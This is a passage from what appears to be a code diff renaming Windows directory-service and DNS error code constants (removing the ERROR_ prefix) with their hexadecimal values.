ERROR_DS_CANT_MIX_MASTER_AND_REPS = 0x208B - ERROR_DS_CHILDREN_EXIST = 0x208C - ERROR_DS_OBJ_NOT_FOUND = 0x208D - ERROR_DS_ALIASED_OBJ_MISSING = 0x208E - ERROR_DS_BAD_NAME_SYNTAX = 0x208F - ERROR_DS_ALIAS_POINTS_TO_ALIAS = 0x2090 - ERROR_DS_CANT_DEREF_ALIAS = 0x2091 - ERROR_DS_OUT_OF_SCOPE = 0x2092 - ERROR_DS_CANT_DELETE_DSA_OBJ = 0x2094 - ERROR_DS_GENERIC_ERROR = 0x2095 - ERROR_DS_DSA_MUST_BE_INT_MASTER = 0x2096 - ERROR_DS_CLASS_NOT_DSA = 0x2097 - ERROR_DS_INSUFF_ACCESS_RIGHTS = 0x2098 - ERROR_DS_ILLEGAL_SUPERIOR = 0x2099 - ERROR_DS_ATTRIBUTE_OWNED_BY_SAM = 0x209A - ERROR_DS_NAME_TOO_MANY_PARTS = 0x209B - ERROR_DS_NAME_TOO_LONG = 0x209C - ERROR_DS_NAME_VALUE_TOO_LONG = 0x209D - ERROR_DS_NAME_UNPARSEABLE = 0x209E - ERROR_DS_NAME_TYPE_UNKNOWN = 0x209F - ERROR_DS_NOT_AN_OBJECT = 0x20A0 - ERROR_DS_SEC_DESC_TOO_SHORT = 0x20A1 - ERROR_DS_SEC_DESC_INVALID = 0x20A2 - ERROR_DS_NO_DELETED_NAME = 0x20A3 - ERROR_DS_SUBREF_MUST_HAVE_PARENT = 0x20A4 - ERROR_DS_NCNAME_MUST_BE_NC = 0x20A5 - ERROR_DS_CANT_ADD_SYSTEM_ONLY = 0x20A6 - ERROR_DS_CLASS_MUST_BE_CONCRETE = 0x20A7 - ERROR_DS_INVALID_DMD = 0x20A8 - ERROR_DS_OBJ_GUID_EXISTS = 0x20A9 - ERROR_DS_NOT_ON_BACKLINK = 0x20AA - ERROR_DS_NO_CROSSREF_FOR_NC = 0x20AB - ERROR_DS_SHUTTING_DOWN = 0x20AC - ERROR_DS_UNKNOWN_OPERATION = 0x20AD - ERROR_DS_INVALID_ROLE_OWNER = 0x20AE - ERROR_DS_COULDNT_CONTACT_FSMO = 0x20AF - ERROR_DS_CROSS_NC_DN_RENAME = 0x20B0 - ERROR_DS_CANT_MOD_SYSTEM_ONLY = 0x20B1 - ERROR_DS_REPLICATOR_ONLY = 0x20B2 - ERROR_DS_OBJ_CLASS_NOT_DEFINED = 0x20B3 - ERROR_DS_OBJ_CLASS_NOT_SUBCLASS = 0x20B4 - ERROR_DS_NAME_REFERENCE_INVALID = 0x20B5 - ERROR_DS_CROSS_REF_EXISTS = 0x20B6 - ERROR_DS_CANT_DEL_MASTER_CROSSREF = 0x20B7 - ERROR_DS_SUBTREE_NOTIFY_NOT_NC_HEAD = 0x20B8 - ERROR_DS_NOTIFY_FILTER_TOO_COMPLEX = 0x20B9 - ERROR_DS_DUP_RDN = 0x20BA - ERROR_DS_DUP_OID = 0x20BB - ERROR_DS_DUP_MAPI_ID = 0x20BC - ERROR_DS_DUP_SCHEMA_ID_GUID = 0x20BD - ERROR_DS_DUP_LDAP_DISPLAY_NAME = 0x20BE - ERROR_DS_SEMANTIC_ATT_TEST = 0x20BF - ERROR_DS_SYNTAX_MISMATCH = 0x20C0 - ERROR_DS_EXISTS_IN_MUST_HAVE = 0x20C1 - ERROR_DS_EXISTS_IN_MAY_HAVE = 0x20C2 - ERROR_DS_NONEXISTENT_MAY_HAVE = 0x20C3 - ERROR_DS_NONEXISTENT_MUST_HAVE = 0x20C4 - ERROR_DS_AUX_CLS_TEST_FAIL = 0x20C5 - ERROR_DS_NONEXISTENT_POSS_SUP = 0x20C6 - ERROR_DS_SUB_CLS_TEST_FAIL = 0x20C7 - ERROR_DS_BAD_RDN_ATT_ID_SYNTAX = 0x20C8 - ERROR_DS_EXISTS_IN_AUX_CLS = 0x20C9 - ERROR_DS_EXISTS_IN_SUB_CLS = 0x20CA - ERROR_DS_EXISTS_IN_POSS_SUP = 0x20CB - ERROR_DS_RECALCSCHEMA_FAILED = 0x20CC - ERROR_DS_TREE_DELETE_NOT_FINISHED = 0x20CD - ERROR_DS_CANT_DELETE = 0x20CE - ERROR_DS_ATT_SCHEMA_REQ_ID = 0x20CF - ERROR_DS_BAD_ATT_SCHEMA_SYNTAX = 0x20D0 - ERROR_DS_CANT_CACHE_ATT = 0x20D1 - ERROR_DS_CANT_CACHE_CLASS = 0x20D2 - ERROR_DS_CANT_REMOVE_ATT_CACHE = 0x20D3 - ERROR_DS_CANT_REMOVE_CLASS_CACHE = 0x20D4 - ERROR_DS_CANT_RETRIEVE_DN = 0x20D5 - ERROR_DS_MISSING_SUPREF = 0x20D6 - ERROR_DS_CANT_RETRIEVE_INSTANCE = 0x20D7 - ERROR_DS_CODE_INCONSISTENCY = 0x20D8 - ERROR_DS_DATABASE_ERROR = 0x20D9 - ERROR_DS_GOVERNSID_MISSING = 0x20DA - ERROR_DS_MISSING_EXPECTED_ATT = 0x20DB - ERROR_DS_NCNAME_MISSING_CR_REF = 0x20DC - ERROR_DS_SECURITY_CHECKING_ERROR = 0x20DD - ERROR_DS_SCHEMA_NOT_LOADED = 0x20DE - ERROR_DS_SCHEMA_ALLOC_FAILED = 0x20DF - ERROR_DS_ATT_SCHEMA_REQ_SYNTAX = 0x20E0 - ERROR_DS_GCVERIFY_ERROR = 0x20E1 - ERROR_DS_DRA_SCHEMA_MISMATCH = 0x20E2 - ERROR_DS_CANT_FIND_DSA_OBJ = 0x20E3 - ERROR_DS_CANT_FIND_EXPECTED_NC = 0x20E4 - ERROR_DS_CANT_FIND_NC_IN_CACHE = 0x20E5 - ERROR_DS_CANT_RETRIEVE_CHILD = 0x20E6 - ERROR_DS_SECURITY_ILLEGAL_MODIFY = 0x20E7 - ERROR_DS_CANT_REPLACE_HIDDEN_REC = 0x20E8 - ERROR_DS_BAD_HIERARCHY_FILE = 0x20E9 - ERROR_DS_BUILD_HIERARCHY_TABLE_FAILED = 0x20EA - ERROR_DS_CONFIG_PARAM_MISSING = 0x20EB - ERROR_DS_COUNTING_AB_INDICES_FAILED = 0x20EC - ERROR_DS_HIERARCHY_TABLE_MALLOC_FAILED = 0x20ED - ERROR_DS_INTERNAL_FAILURE = 0x20EE - ERROR_DS_UNKNOWN_ERROR = 0x20EF - ERROR_DS_ROOT_REQUIRES_CLASS_TOP = 0x20F0 - ERROR_DS_REFUSING_FSMO_ROLES = 0x20F1 - ERROR_DS_MISSING_FSMO_SETTINGS = 0x20F2 - ERROR_DS_UNABLE_TO_SURRENDER_ROLES = 0x20F3 - ERROR_DS_DRA_GENERIC = 0x20F4 - ERROR_DS_DRA_INVALID_PARAMETER = 0x20F5 - ERROR_DS_DRA_BUSY = 0x20F6 - ERROR_DS_DRA_BAD_DN = 0x20F7 - ERROR_DS_DRA_BAD_NC = 0x20F8 - ERROR_DS_DRA_DN_EXISTS = 0x20F9 - ERROR_DS_DRA_INTERNAL_ERROR = 0x20FA - ERROR_DS_DRA_INCONSISTENT_DIT = 0x20FB - ERROR_DS_DRA_CONNECTION_FAILED = 0x20FC - ERROR_DS_DRA_BAD_INSTANCE_TYPE = 0x20FD - ERROR_DS_DRA_OUT_OF_MEM = 0x20FE - ERROR_DS_DRA_MAIL_PROBLEM = 0x20FF - ERROR_DS_DRA_REF_ALREADY_EXISTS = 0x2100 - ERROR_DS_DRA_REF_NOT_FOUND = 0x2101 - ERROR_DS_DRA_OBJ_IS_REP_SOURCE = 0x2102 - ERROR_DS_DRA_DB_ERROR = 0x2103 - ERROR_DS_DRA_NO_REPLICA = 0x2104 - ERROR_DS_DRA_ACCESS_DENIED = 0x2105 - ERROR_DS_DRA_NOT_SUPPORTED = 0x2106 - ERROR_DS_DRA_RPC_CANCELLED = 0x2107 - ERROR_DS_DRA_SOURCE_DISABLED = 0x2108 - ERROR_DS_DRA_SINK_DISABLED = 0x2109 - ERROR_DS_DRA_NAME_COLLISION = 0x210A - ERROR_DS_DRA_SOURCE_REINSTALLED = 0x210B - ERROR_DS_DRA_MISSING_PARENT = 0x210C - ERROR_DS_DRA_PREEMPTED = 0x210D - ERROR_DS_DRA_ABANDON_SYNC = 0x210E - ERROR_DS_DRA_SHUTDOWN = 0x210F - ERROR_DS_DRA_INCOMPATIBLE_PARTIAL_SET = 0x2110 - ERROR_DS_DRA_SOURCE_IS_PARTIAL_REPLICA = 0x2111 - ERROR_DS_DRA_EXTN_CONNECTION_FAILED = 0x2112 - ERROR_DS_INSTALL_SCHEMA_MISMATCH = 0x2113 - ERROR_DS_DUP_LINK_ID = 0x2114 - ERROR_DS_NAME_ERROR_RESOLVING = 0x2115 - ERROR_DS_NAME_ERROR_NOT_FOUND = 0x2116 - ERROR_DS_NAME_ERROR_NOT_UNIQUE = 0x2117 - ERROR_DS_NAME_ERROR_NO_MAPPING = 0x2118 - ERROR_DS_NAME_ERROR_DOMAIN_ONLY = 0x2119 - ERROR_DS_NAME_ERROR_NO_SYNTACTICAL_MAPPING = 0x211A - ERROR_DS_CONSTRUCTED_ATT_MOD = 0x211B - ERROR_DS_WRONG_OM_OBJ_CLASS = 0x211C - ERROR_DS_DRA_REPL_PENDING = 0x211D - ERROR_DS_DS_REQUIRED = 0x211E - ERROR_DS_INVALID_LDAP_DISPLAY_NAME = 0x211F - ERROR_DS_NON_BASE_SEARCH = 0x2120 - ERROR_DS_CANT_RETRIEVE_ATTS = 0x2121 - ERROR_DS_BACKLINK_WITHOUT_LINK = 0x2122 - ERROR_DS_EPOCH_MISMATCH = 0x2123 - ERROR_DS_SRC_NAME_MISMATCH = 0x2124 - ERROR_DS_SRC_AND_DST_NC_IDENTICAL = 0x2125 - ERROR_DS_DST_NC_MISMATCH = 0x2126 - ERROR_DS_NOT_AUTHORITIVE_FOR_DST_NC = 0x2127 - ERROR_DS_SRC_GUID_MISMATCH = 0x2128 - ERROR_DS_CANT_MOVE_DELETED_OBJECT = 0x2129 - ERROR_DS_PDC_OPERATION_IN_PROGRESS = 0x212A - ERROR_DS_CROSS_DOMAIN_CLEANUP_REQD = 0x212B - ERROR_DS_ILLEGAL_XDOM_MOVE_OPERATION = 0x212C - ERROR_DS_CANT_WITH_ACCT_GROUP_MEMBERSHPS = 0x212D - ERROR_DS_NC_MUST_HAVE_NC_PARENT = 0x212E - ERROR_DS_CR_IMPOSSIBLE_TO_VALIDATE = 0x212F - ERROR_DS_DST_DOMAIN_NOT_NATIVE = 0x2130 - ERROR_DS_MISSING_INFRASTRUCTURE_CONTAINER = 0x2131 - ERROR_DS_CANT_MOVE_ACCOUNT_GROUP = 0x2132 - ERROR_DS_CANT_MOVE_RESOURCE_GROUP = 0x2133 - ERROR_DS_INVALID_SEARCH_FLAG = 0x2134 - ERROR_DS_NO_TREE_DELETE_ABOVE_NC = 0x2135 - ERROR_DS_COULDNT_LOCK_TREE_FOR_DELETE = 0x2136 - ERROR_DS_COULDNT_IDENTIFY_OBJECTS_FOR_TREE_DELETE = 0x2137 - ERROR_DS_SAM_INIT_FAILURE = 0x2138 - ERROR_DS_SENSITIVE_GROUP_VIOLATION = 0x2139 - ERROR_DS_CANT_MOD_PRIMARYGROUPID = 0x213A - ERROR_DS_ILLEGAL_BASE_SCHEMA_MOD = 0x213B - ERROR_DS_NONSAFE_SCHEMA_CHANGE = 0x213C - ERROR_DS_SCHEMA_UPDATE_DISALLOWED = 0x213D - ERROR_DS_CANT_CREATE_UNDER_SCHEMA = 0x213E - ERROR_DS_INSTALL_NO_SRC_SCH_VERSION = 0x213F - ERROR_DS_INSTALL_NO_SCH_VERSION_IN_INIFILE = 0x2140 - ERROR_DS_INVALID_GROUP_TYPE = 0x2141 - ERROR_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN = 0x2142 - ERROR_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN = 0x2143 - ERROR_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER = 0x2144 - ERROR_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER = 0x2145 - ERROR_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER = 0x2146 - ERROR_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER = 0x2147 - ERROR_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER = 0x2148 - ERROR_DS_HAVE_PRIMARY_MEMBERS = 0x2149 - ERROR_DS_STRING_SD_CONVERSION_FAILED = 0x214A - ERROR_DS_NAMING_MASTER_GC = 0x214B - ERROR_DS_LOOKUP_FAILURE = 0x214C - ERROR_DS_COULDNT_UPDATE_SPNS = 0x214D - ERROR_DS_CANT_RETRIEVE_SD = 0x214E - ERROR_DS_KEY_NOT_UNIQUE = 0x214F - ERROR_DS_WRONG_LINKED_ATT_SYNTAX = 0x2150 - ERROR_DS_SAM_NEED_BOOTKEY_PASSWORD = 0x2151 - ERROR_DS_SAM_NEED_BOOTKEY_FLOPPY = 0x2152 - ERROR_DS_CANT_START = 0x2153 - ERROR_DS_INIT_FAILURE = 0x2154 - ERROR_DS_NO_PKT_PRIVACY_ON_CONNECTION = 0x2155 - ERROR_DS_SOURCE_DOMAIN_IN_FOREST = 0x2156 - ERROR_DS_DESTINATION_DOMAIN_NOT_IN_FOREST = 0x2157 - ERROR_DS_DESTINATION_AUDITING_NOT_ENABLED = 0x2158 - ERROR_DS_CANT_FIND_DC_FOR_SRC_DOMAIN = 0x2159 - ERROR_DS_SRC_OBJ_NOT_GROUP_OR_USER = 0x215A - ERROR_DS_SRC_SID_EXISTS_IN_FOREST = 0x215B - ERROR_DS_SRC_AND_DST_OBJECT_CLASS_MISMATCH = 0x215C - ERROR_SAM_INIT_FAILURE = 0x215D - ERROR_DS_DRA_SCHEMA_INFO_SHIP = 0x215E - ERROR_DS_DRA_SCHEMA_CONFLICT = 0x215F - ERROR_DS_DRA_EARLIER_SCHEMA_CONLICT = 0x2160 - ERROR_DS_DRA_OBJ_NC_MISMATCH = 0x2161 - ERROR_DS_NC_STILL_HAS_DSAS = 0x2162 - ERROR_DS_GC_REQUIRED = 0x2163 - ERROR_DS_LOCAL_MEMBER_OF_LOCAL_ONLY = 0x2164 - ERROR_DS_NO_FPO_IN_UNIVERSAL_GROUPS = 0x2165 - ERROR_DS_CANT_ADD_TO_GC = 0x2166 - ERROR_DS_NO_CHECKPOINT_WITH_PDC = 0x2167 - ERROR_DS_SOURCE_AUDITING_NOT_ENABLED = 0x2168 - ERROR_DS_CANT_CREATE_IN_NONDOMAIN_NC = 0x2169 - ERROR_DS_INVALID_NAME_FOR_SPN = 0x216A - ERROR_DS_FILTER_USES_CONTRUCTED_ATTRS = 0x216B - ERROR_DS_UNICODEPWD_NOT_IN_QUOTES = 0x216C - ERROR_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED = 0x216D - ERROR_DS_MUST_BE_RUN_ON_DST_DC = 0x216E - ERROR_DS_SRC_DC_MUST_BE_SP4_OR_GREATER = 0x216F - ERROR_DS_CANT_TREE_DELETE_CRITICAL_OBJ = 0x2170 - ERROR_DS_INIT_FAILURE_CONSOLE = 0x2171 - ERROR_DS_SAM_INIT_FAILURE_CONSOLE = 0x2172 - ERROR_DS_FOREST_VERSION_TOO_HIGH = 0x2173 - ERROR_DS_DOMAIN_VERSION_TOO_HIGH = 0x2174 - ERROR_DS_FOREST_VERSION_TOO_LOW = 0x2175 - ERROR_DS_DOMAIN_VERSION_TOO_LOW = 0x2176 - ERROR_DS_INCOMPATIBLE_VERSION = 0x2177 - ERROR_DS_LOW_DSA_VERSION = 0x2178 - ERROR_DS_NO_BEHAVIOR_VERSION_IN_MIXEDDOMAIN = 0x2179 - ERROR_DS_NOT_SUPPORTED_SORT_ORDER = 0x217A - ERROR_DS_NAME_NOT_UNIQUE = 0x217B - ERROR_DS_MACHINE_ACCOUNT_CREATED_PRENT4 = 0x217C - ERROR_DS_OUT_OF_VERSION_STORE = 0x217D - ERROR_DS_INCOMPATIBLE_CONTROLS_USED = 0x217E - ERROR_DS_NO_REF_DOMAIN = 0x217F - ERROR_DS_RESERVED_LINK_ID = 0x2180 - ERROR_DS_LINK_ID_NOT_AVAILABLE = 0x2181 - ERROR_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER = 0x2182 - ERROR_DS_MODIFYDN_DISALLOWED_BY_INSTANCE_TYPE = 0x2183 - ERROR_DS_NO_OBJECT_MOVE_IN_SCHEMA_NC = 0x2184 - ERROR_DS_MODIFYDN_DISALLOWED_BY_FLAG = 0x2185 - ERROR_DS_MODIFYDN_WRONG_GRANDPARENT = 0x2186 - ERROR_DS_NAME_ERROR_TRUST_REFERRAL = 0x2187 - ERROR_NOT_SUPPORTED_ON_STANDARD_SERVER = 0x2188 - ERROR_DS_CANT_ACCESS_REMOTE_PART_OF_AD = 0x2189 - ERROR_DS_CR_IMPOSSIBLE_TO_VALIDATE_V2 = 0x218A - ERROR_DS_THREAD_LIMIT_EXCEEDED = 0x218B - ERROR_DS_NOT_CLOSEST = 0x218C - ERROR_DS_CANT_DERIVE_SPN_WITHOUT_SERVER_REF = 0x218D - ERROR_DS_SINGLE_USER_MODE_FAILED = 0x218E - ERROR_DS_NTDSCRIPT_SYNTAX_ERROR = 0x218F - ERROR_DS_NTDSCRIPT_PROCESS_ERROR = 0x2190 - ERROR_DS_DIFFERENT_REPL_EPOCHS = 0x2191 - ERROR_DS_DRS_EXTENSIONS_CHANGED = 0x2192 - ERROR_DS_REPLICA_SET_CHANGE_NOT_ALLOWED_ON_DISABLED_CR = 0x2193 - ERROR_DS_NO_MSDS_INTID = 0x2194 - ERROR_DS_DUP_MSDS_INTID = 0x2195 - ERROR_DS_EXISTS_IN_RDNATTID = 0x2196 - ERROR_DS_AUTHORIZATION_FAILED = 0x2197 - ERROR_DS_INVALID_SCRIPT = 0x2198 - ERROR_DS_REMOTE_CROSSREF_OP_FAILED = 0x2199 - ERROR_DS_CROSS_REF_BUSY = 0x219A - ERROR_DS_CANT_DERIVE_SPN_FOR_DELETED_DOMAIN = 0x219B - ERROR_DS_CANT_DEMOTE_WITH_WRITEABLE_NC = 0x219C - ERROR_DS_DUPLICATE_ID_FOUND = 0x219D - ERROR_DS_INSUFFICIENT_ATTR_TO_CREATE_OBJECT = 0x219E - ERROR_DS_GROUP_CONVERSION_ERROR = 0x219F - ERROR_DS_CANT_MOVE_APP_BASIC_GROUP = 0x21A0 - ERROR_DS_CANT_MOVE_APP_QUERY_GROUP = 0x21A1 - ERROR_DS_ROLE_NOT_VERIFIED = 0x21A2 - ERROR_DS_WKO_CONTAINER_CANNOT_BE_SPECIAL = 0x21A3 - ERROR_DS_DOMAIN_RENAME_IN_PROGRESS = 0x21A4 - ERROR_DS_EXISTING_AD_CHILD_NC = 0x21A5 - ERROR_DS_REPL_LIFETIME_EXCEEDED = 0x21A6 - ERROR_DS_DISALLOWED_IN_SYSTEM_CONTAINER = 0x21A7 - ERROR_DS_LDAP_SEND_QUEUE_FULL = 0x21A8 - ERROR_DS_DRA_OUT_SCHEDULE_WINDOW = 0x21A9 - ERROR_DS_POLICY_NOT_KNOWN = 0x21AA - ERROR_NO_SITE_SETTINGS_OBJECT = 0x21AB - ERROR_NO_SECRETS = 0x21AC - ERROR_NO_WRITABLE_DC_FOUND = 0x21AD - ERROR_DS_NO_SERVER_OBJECT = 0x21AE - ERROR_DS_NO_NTDSA_OBJECT = 0x21AF - ERROR_DS_NON_ASQ_SEARCH = 0x21B0 - ERROR_DS_AUDIT_FAILURE = 0x21B1 - ERROR_DS_INVALID_SEARCH_FLAG_SUBTREE = 0x21B2 - ERROR_DS_INVALID_SEARCH_FLAG_TUPLE = 0x21B3 - ERROR_DS_HIERARCHY_TABLE_TOO_DEEP = 0x21B4 - ERROR_DS_DRA_CORRUPT_UTD_VECTOR = 0x21B5 - ERROR_DS_DRA_SECRETS_DENIED = 0x21B6 - ERROR_DS_RESERVED_MAPI_ID = 0x21B7 - ERROR_DS_MAPI_ID_NOT_AVAILABLE = 0x21B8 - ERROR_DS_DRA_MISSING_KRBTGT_SECRET = 0x21B9 - ERROR_DS_DOMAIN_NAME_EXISTS_IN_FOREST = 0x21BA - ERROR_DS_FLAT_NAME_EXISTS_IN_FOREST = 0x21BB - ERROR_INVALID_USER_PRINCIPAL_NAME = 0x21BC - ERROR_DS_OID_MAPPED_GROUP_CANT_HAVE_MEMBERS = 0x21BD - ERROR_DS_OID_NOT_FOUND = 0x21BE - ERROR_DS_DRA_RECYCLED_TARGET = 0x21BF - DNS_ERROR_RCODE_FORMAT_ERROR = 0x2329 - DNS_ERROR_RCODE_SERVER_FAILURE = 0x232A - DNS_ERROR_RCODE_NAME_ERROR = 0x232B - DNS_ERROR_RCODE_NOT_IMPLEMENTED = 0x232C - DNS_ERROR_RCODE_REFUSED = 0x232D - DNS_ERROR_RCODE_YXDOMAIN = 0x232E - DNS_ERROR_RCODE_YXRRSET = 0x232F - DNS_ERROR_RCODE_NXRRSET = 0x2330 - DNS_ERROR_RCODE_NOTAUTH = 0x2331 - DNS_ERROR_RCODE_NOTZONE = 0x2332 - DNS_ERROR_RCODE_BADSIG = 0x2338 - DNS_ERROR_RCODE_BADKEY = 0x2339 - DNS_ERROR_RCODE_BADTIME = 0x233A + DS_NOT_INSTALLED = 0x2008 + DS_MEMBERSHIP_EVALUATED_LOCALLY = 0x2009 + DS_NO_ATTRIBUTE_OR_VALUE = 0x200A + DS_INVALID_ATTRIBUTE_SYNTAX = 0x200B + DS_ATTRIBUTE_TYPE_UNDEFINED = 0x200C + DS_ATTRIBUTE_OR_VALUE_EXISTS = 0x200D + DS_BUSY = 0x200E + DS_UNAVAILABLE = 0x200F + DS_NO_RIDS_ALLOCATED = 0x2010 + DS_NO_MORE_RIDS = 0x2011 + DS_INCORRECT_ROLE_OWNER = 0x2012 + DS_RIDMGR_INIT_ERROR = 0x2013 + DS_OBJ_CLASS_VIOLATION = 0x2014 + DS_CANT_ON_NON_LEAF = 0x2015 + DS_CANT_ON_RDN = 0x2016 + DS_CANT_MOD_OBJ_CLASS = 0x2017 + DS_CROSS_DOM_MOVE_ERROR = 0x2018 + DS_GC_NOT_AVAILABLE = 0x2019 + SHARED_POLICY = 0x201A + POLICY_OBJECT_NOT_FOUND = 0x201B + POLICY_ONLY_IN_DS = 0x201C + PROMOTION_ACTIVE = 0x201D + NO_PROMOTION_ACTIVE = 0x201E + DS_OPERATIONS_ERROR = 0x2020 + DS_PROTOCOL_ERROR = 0x2021 + DS_TIMELIMIT_EXCEEDED = 0x2022 + DS_SIZELIMIT_EXCEEDED = 0x2023 + DS_ADMIN_LIMIT_EXCEEDED = 0x2024 + DS_COMPARE_FALSE = 0x2025 + DS_COMPARE_TRUE = 0x2026 + DS_AUTH_METHOD_NOT_SUPPORTED = 0x2027 + DS_STRONG_AUTH_REQUIRED = 0x2028 + DS_INAPPROPRIATE_AUTH = 0x2029 + DS_AUTH_UNKNOWN = 0x202A + DS_REFERRAL = 0x202B + DS_UNAVAILABLE_CRIT_EXTENSION = 0x202C + DS_CONFIDENTIALITY_REQUIRED = 0x202D + DS_INAPPROPRIATE_MATCHING = 0x202E + DS_CONSTRAINT_VIOLATION = 0x202F + DS_NO_SUCH_OBJECT = 0x2030 + DS_ALIAS_PROBLEM = 0x2031 + DS_INVALID_DN_SYNTAX = 0x2032 + DS_IS_LEAF = 0x2033 + DS_ALIAS_DEREF_PROBLEM = 0x2034 + DS_UNWILLING_TO_PERFORM = 0x2035 + DS_LOOP_DETECT = 0x2036 + DS_NAMING_VIOLATION = 0x2037 + DS_OBJECT_RESULTS_TOO_LARGE = 0x2038 + DS_AFFECTS_MULTIPLE_DSAS = 0x2039 + DS_SERVER_DOWN = 0x203A + DS_LOCAL_ERROR = 0x203B + DS_ENCODING_ERROR = 0x203C + DS_DECODING_ERROR = 0x203D + DS_FILTER_UNKNOWN = 0x203E + DS_PARAM_ERROR = 0x203F + DS_NOT_SUPPORTED = 0x2040 + DS_NO_RESULTS_RETURNED = 0x2041 + DS_CONTROL_NOT_FOUND = 0x2042 + DS_CLIENT_LOOP = 0x2043 + DS_REFERRAL_LIMIT_EXCEEDED = 0x2044 + DS_SORT_CONTROL_MISSING = 0x2045 + DS_OFFSET_RANGE_ERROR = 0x2046 + DS_ROOT_MUST_BE_NC = 0x206D + DS_ADD_REPLICA_INHIBITED = 0x206E + DS_ATT_NOT_DEF_IN_SCHEMA = 0x206F + DS_MAX_OBJ_SIZE_EXCEEDED = 0x2070 + DS_OBJ_STRING_NAME_EXISTS = 0x2071 + DS_NO_RDN_DEFINED_IN_SCHEMA = 0x2072 + DS_RDN_DOESNT_MATCH_SCHEMA = 0x2073 + DS_NO_REQUESTED_ATTS_FOUND = 0x2074 + DS_USER_BUFFER_TO_SMALL = 0x2075 + DS_ATT_IS_NOT_ON_OBJ = 0x2076 + DS_ILLEGAL_MOD_OPERATION = 0x2077 + DS_OBJ_TOO_LARGE = 0x2078 + DS_BAD_INSTANCE_TYPE = 0x2079 + DS_MASTERDSA_REQUIRED = 0x207A + DS_OBJECT_CLASS_REQUIRED = 0x207B + DS_MISSING_REQUIRED_ATT = 0x207C + DS_ATT_NOT_DEF_FOR_CLASS = 0x207D + DS_ATT_ALREADY_EXISTS = 0x207E + DS_CANT_ADD_ATT_VALUES = 0x2080 + DS_SINGLE_VALUE_CONSTRAINT = 0x2081 + DS_RANGE_CONSTRAINT = 0x2082 + DS_ATT_VAL_ALREADY_EXISTS = 0x2083 + DS_CANT_REM_MISSING_ATT = 0x2084 + DS_CANT_REM_MISSING_ATT_VAL = 0x2085 + DS_ROOT_CANT_BE_SUBREF = 0x2086 + DS_NO_CHAINING = 0x2087 + DS_NO_CHAINED_EVAL = 0x2088 + DS_NO_PARENT_OBJECT = 0x2089 + DS_PARENT_IS_AN_ALIAS = 0x208A + DS_CANT_MIX_MASTER_AND_REPS = 0x208B + DS_CHILDREN_EXIST = 0x208C + DS_OBJ_NOT_FOUND = 0x208D + DS_ALIASED_OBJ_MISSING = 0x208E + DS_BAD_NAME_SYNTAX = 0x208F + DS_ALIAS_POINTS_TO_ALIAS = 0x2090 + DS_CANT_DEREF_ALIAS = 0x2091 + DS_OUT_OF_SCOPE = 0x2092 + DS_CANT_DELETE_DSA_OBJ = 0x2094 + DS_GENERIC_ERROR = 0x2095 + DS_DSA_MUST_BE_INT_MASTER = 0x2096 + DS_CLASS_NOT_DSA = 0x2097 + DS_INSUFF_ACCESS_RIGHTS = 0x2098 + DS_ILLEGAL_SUPERIOR = 0x2099 + DS_ATTRIBUTE_OWNED_BY_SAM = 0x209A + DS_NAME_TOO_MANY_PARTS = 0x209B + DS_NAME_TOO_LONG = 0x209C + DS_NAME_VALUE_TOO_LONG = 0x209D + DS_NAME_UNPARSEABLE = 0x209E + DS_NAME_TYPE_UNKNOWN = 0x209F + DS_NOT_AN_OBJECT = 0x20A0 + DS_SEC_DESC_TOO_SHORT = 0x20A1 + DS_SEC_DESC_INVALID = 0x20A2 + DS_NO_DELETED_NAME = 0x20A3 + DS_SUBREF_MUST_HAVE_PARENT = 0x20A4 + DS_NCNAME_MUST_BE_NC = 0x20A5 + DS_CANT_ADD_SYSTEM_ONLY = 0x20A6 + DS_CLASS_MUST_BE_CONCRETE = 0x20A7 + DS_INVALID_DMD = 0x20A8 + DS_OBJ_GUID_EXISTS = 0x20A9 + DS_NOT_ON_BACKLINK = 0x20AA + DS_NO_CROSSREF_FOR_NC = 0x20AB + DS_SHUTTING_DOWN = 0x20AC + DS_UNKNOWN_OPERATION = 0x20AD + DS_INVALID_ROLE_OWNER = 0x20AE + DS_COULDNT_CONTACT_FSMO = 0x20AF + DS_CROSS_NC_DN_RENAME = 0x20B0 + DS_CANT_MOD_SYSTEM_ONLY = 0x20B1 + DS_REPLICATOR_ONLY = 0x20B2 + DS_OBJ_CLASS_NOT_DEFINED = 0x20B3 + DS_OBJ_CLASS_NOT_SUBCLASS = 0x20B4 + DS_NAME_REFERENCE_INVALID = 0x20B5 + DS_CROSS_REF_EXISTS = 0x20B6 + DS_CANT_DEL_MASTER_CROSSREF = 0x20B7 + DS_SUBTREE_NOTIFY_NOT_NC_HEAD = 0x20B8 + DS_NOTIFY_FILTER_TOO_COMPLEX = 0x20B9 + DS_DUP_RDN = 0x20BA + DS_DUP_OID = 0x20BB + DS_DUP_MAPI_ID = 0x20BC + DS_DUP_SCHEMA_ID_GUID = 0x20BD + DS_DUP_LDAP_DISPLAY_NAME = 0x20BE + DS_SEMANTIC_ATT_TEST = 0x20BF + DS_SYNTAX_MISMATCH = 0x20C0 + DS_EXISTS_IN_MUST_HAVE = 0x20C1 + DS_EXISTS_IN_MAY_HAVE = 0x20C2 + DS_NONEXISTENT_MAY_HAVE = 0x20C3 + DS_NONEXISTENT_MUST_HAVE = 0x20C4 + DS_AUX_CLS_TEST_FAIL = 0x20C5 + DS_NONEXISTENT_POSS_SUP = 0x20C6 + DS_SUB_CLS_TEST_FAIL = 0x20C7 + DS_BAD_RDN_ATT_ID_SYNTAX = 0x20C8 + DS_EXISTS_IN_AUX_CLS = 0x20C9 + DS_EXISTS_IN_SUB_CLS = 0x20CA + DS_EXISTS_IN_POSS_SUP = 0x20CB + DS_RECALCSCHEMA_FAILED = 0x20CC + DS_TREE_DELETE_NOT_FINISHED = 0x20CD + DS_CANT_DELETE = 0x20CE + DS_ATT_SCHEMA_REQ_ID = 0x20CF + DS_BAD_ATT_SCHEMA_SYNTAX = 0x20D0 + DS_CANT_CACHE_ATT = 0x20D1 + DS_CANT_CACHE_CLASS = 0x20D2 + DS_CANT_REMOVE_ATT_CACHE = 0x20D3 + DS_CANT_REMOVE_CLASS_CACHE = 0x20D4 + DS_CANT_RETRIEVE_DN 